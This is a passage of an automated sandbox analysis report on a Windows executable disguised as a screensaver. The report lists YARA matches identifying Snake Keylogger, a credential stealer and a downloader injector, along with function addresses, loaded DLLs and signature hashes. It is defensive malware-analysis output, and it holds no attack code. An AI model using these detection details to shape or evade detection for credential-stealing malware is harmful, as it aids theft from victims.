        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.2f53b10.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
        Source: 1.2.PT98765445670009.scr.exe.2f512e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
        Source: 00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
        Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6900, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: Process Memory Space: PT98765445670009.scr.exe PID: 6880, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 1_2_02D4AC181_2_02D4AC18
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3B3882_2_02C3B388
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3C1F02_2_02C3C1F0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C361682_2_02C36168
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C367902_2_02C36790
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3C7B12_2_02C3C7B1
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3C4D02_2_02C3C4D0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3CA912_2_02C3CA91
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3FA102_2_02C3FA10
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C34B312_2_02C34B31
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C398B82_2_02C398B8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3EDF02_2_02C3EDF0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3E3002_2_02C3E300
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3E3102_2_02C3E310
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C335C82_2_02C335C8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_02C3B5532_2_02C3B553
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C0D602_2_052C0D60
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C36882_2_052C3688
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C79882_2_052C7988
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CC8B82_2_052CC8B8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C82782_2_052C8278
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CCD032_2_052CCD03
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CCD102_2_052CCD10
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C0D502_2_052C0D50
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CD5B02_2_052CD5B0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CD5C02_2_052CD5C0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CF4282_2_052CF428
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CF4182_2_052CF418
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CC4602_2_052CC460
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CC4502_2_052CC450
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C04A02_2_052C04A0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C04902_2_052C0490
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CE7202_2_052CE720
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CE7102_2_052CE710
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CB7482_2_052CB748
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CB7582_2_052CB758
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CBFF82_2_052CBFF8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CEFC12_2_052CEFC1
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CEFD02_2_052CEFD0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CDE632_2_052CDE63
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C36782_2_052C3678
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CDE702_2_052CDE70
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C09002_2_052C0900
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CD1682_2_052CD168
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CD1582_2_052CD158
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C71FC2_2_052C71FC
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C81FF2_2_052C81FF
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CC0082_2_052CC008
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C00132_2_052C0013
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CF8712_2_052CF871
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C00402_2_052C0040
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CC8A82_2_052CC8A8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CF8802_2_052CF880
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C08F12_2_052C08F1
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CB3002_2_052CB300
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CEB682_2_052CEB68
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CEB782_2_052CEB78
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C7BA82_2_052C7BA8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CBBA02_2_052CBBA0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CBBB02_2_052CBBB0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CDA092_2_052CDA09
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052C72002_2_052C7200
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CDA182_2_052CDA18
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CE2B82_2_052CE2B8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CB2EF2_2_052CB2EF
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_052CE2C82_2_052CE2C8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DB6E82_2_069DB6E8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D86082_2_069D8608
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DAA582_2_069DAA58
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DD6702_2_069DD670
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DC3882_2_069DC388
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D8BED2_2_069D8BED
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DB0A02_2_069DB0A0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DA4082_2_069DA408
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DD0282_2_069DD028
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D11A02_2_069D11A0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DC9D82_2_069DC9D8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DBD382_2_069DBD38
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D5EB82_2_069D5EB8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DB6D82_2_069DB6D8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D5EC82_2_069D5EC8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D56182_2_069D5618
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D560B2_2_069D560B
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DAA482_2_069DAA48
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D5A702_2_069D5A70
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D5A602_2_069D5A60
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DD6622_2_069DD662
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D33B82_2_069D33B8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D33A82_2_069D33A8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D6BD02_2_069D6BD0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D6BC12_2_069D6BC1
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DA3FA2_2_069DA3FA
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D63132_2_069D6313
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D37302_2_069D3730
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D63202_2_069D6320
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D67782_2_069D6778
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DC3782_2_069DC378
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D676B2_2_069D676B
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D04982_2_069D0498
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D74972_2_069D7497
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DB0902_2_069DB090
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D04882_2_069D0488
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D74A82_2_069D74A8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D08F02_2_069D08F0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D78F02_2_069D78F0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D08E02_2_069D08E0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D28182_2_069D2818
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DD0182_2_069DD018
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D28072_2_069D2807
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D00062_2_069D0006
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D44302_2_069D4430
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D70502_2_069D7050
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D00402_2_069D0040
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D70402_2_069D7040
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D51982_2_069D5198
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D11912_2_069D1191
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D518B2_2_069D518B
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D81B02_2_069D81B0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D81A02_2_069D81A0
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DC9C82_2_069DC9C8
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D85FC2_2_069D85FC
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D79002_2_069D7900
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D0D392_2_069D0D39
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069DBD282_2_069DBD28
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D7D582_2_069D7D58
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D0D482_2_069D0D48
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeCode function: 2_2_069D7D482_2_069D7D48
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000004034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1238457228.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240078291.0000000003F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000000.1224946273.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePATVENT.exe( vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240796896.00000000055C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1239975180.0000000002F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1239975180.0000000002F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000002.00000002.3683545276.0000000000BB7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exe, 00000002.00000002.3682390166.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PT98765445670009.scr.exe
        Source: PT98765445670009.scr.exeBinary or memory string: OriginalFilenamePATVENT.exe( vs PT98765445670009.scr.exe
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PT98765445670009.scr.exeSection loaded: dpapi.dllJump to behavior
        Source: PT98765445670009.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.3f93da0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.3fe25d0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.5500000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 1.2.PT98765445670009.scr.exe.4096c60.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 1.2.PT98765445670009.scr.exe.4076230.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
        Source: 2.2.PT98765445670009.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
